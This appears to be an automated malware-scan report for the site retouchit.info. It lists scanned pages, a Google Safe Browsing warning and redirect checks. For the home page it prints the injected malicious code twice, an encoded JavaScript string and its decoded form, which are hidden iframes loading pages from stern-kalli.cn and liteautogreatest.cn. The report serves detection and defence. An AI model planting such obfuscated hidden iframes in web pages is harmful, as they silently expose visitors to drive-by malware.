Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=retouchit.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://retouchit.info/ | 200 OK Content-Length: 8403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var qJZvsgRNxXKdXzehFBCW = "E60E105E102E114E97E109E101E32E119E105E100E116E104E61E34E52E56E48E34E32E104E101E105E103E104E116E61E34E54E48E34E32E115E114E99E61E34E104E116E116E112E58E47E47E115E116E101E114E110E45E107E97E108E108E105E46E99E110E47E105E110E51E47E105E110E100E101E120E46E112E104E112E34E32E115E116E121E108E101E61E34E98E111E114E100E101E114E58E48E112E120E59E32E112E111E115E105E116E105E111E110E58E114E101E108E97E116E105E118E101E59E32E116E111E112E58E48E112E120E59E32E108E101E102E116E58E45E53E48E48E112 Decoded script: <iframe width="480" height="60" src="http://stern-kalli.cn/in3/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
Hidden iFrame found. size: 160x129 style: hidden src: http://liteautogreatest.cn:8080/index.php <iframe src="http://liteautogreatest.cn:8080/index.php" width=160 height=129 style="visibility: hidden"> | ||
http://retouchit.info/expandingMenu.js | 200 OK Content-Length: 2445 Content-Type: application/x-javascript | clean |
http://retouchit.info/tutorials/redeye.html | 200 OK Content-Length: 8994 Content-Type: text/html | clean |
http://retouchit.info/tutorials/expandingMenu.js | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://retouchit.info/test404page.js | 404 Not Found Content-Length: 395 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 20008 Content-Type: text/javascript | clean |
http://rwilliamj.hopfeed.com/script/hopfeed.js | 200 OK Content-Length: 216 Content-Type: text/javascript | clean |
http://api.widgetbucks.com/script/ads.js?uid=I4jJlzqXLDDFmcxL | 200 OK Content-Length: 76 Content-Type: text/html | clean |
http://kona.kontera.com/javascript/lib/KonaLibInline.js | 200 OK Content-Length: 15060 Content-Type: text/javascript | clean |
http://retouchit.info/tutorials/whitenteeth.html | 200 OK Content-Length: 8933 Content-Type: text/html | clean |
http://retouchit.info/tutorials/../index.html | 200 OK Content-Length: 8403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var qJZvsgRNxXKdXzehFBCW = "E60E105E102E114E97E109E101E32E119E105E100E116E104E61E34E52E56E48E34E32E104E101E105E103E104E116E61E34E54E48E34E32E115E114E99E61E34E104E116E116E112E58E47E47E115E116E101E114E110E45E107E97E108E108E105E46E99E110E47E105E110E51E47E105E110E100E101E120E46E112E104E112E34E32E115E116E121E108E101E61E34E98E111E114E100E101E114E58E48E112E120E59E32E112E111E115E105E116E105E111E110E58E114E101E108E97E116E105E118E101E59E32E116E111E112E58E48E112E120E59E32E108E101E102E116E58E45E53E48E48E112 Decoded script: <iframe width="480" height="60" src="http://stern-kalli.cn/in3/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
Hidden iFrame found. size: 160x129 style: hidden src: http://liteautogreatest.cn:8080/index.php <iframe src="http://liteautogreatest.cn:8080/index.php" width=160 height=129 style="visibility: hidden"> | ||
http://retouchit.info/tutorials/../expandingMenu.js | 200 OK Content-Length: 2445 Content-Type: application/x-javascript | clean |
http://retouchit.info/tutorials/../tutorials/redeye.html | 200 OK Content-Length: 8994 Content-Type: text/html | clean |
http://retouchit.info/tutorials/../tutorials/expandingMenu.js | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://retouchit.info/tutorials/../tutorials/whitenteeth.html | 200 OK Content-Length: 8933 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: retouchit.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 18:38:17 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 8403
Content-Type: text/html
...8403 bytes of data.
GET / HTTP/1.1
Host: retouchit.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 18:38:17 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 8403
Content-Type: text/html
...8403 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: retouchit.info
Referer: http://www.google.com/search?q=retouchit.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: retouchit.info
Referer: http://www.google.com/search?q=retouchit.info
Result:
The result is similar to the first query. There are no suspicious redirects found.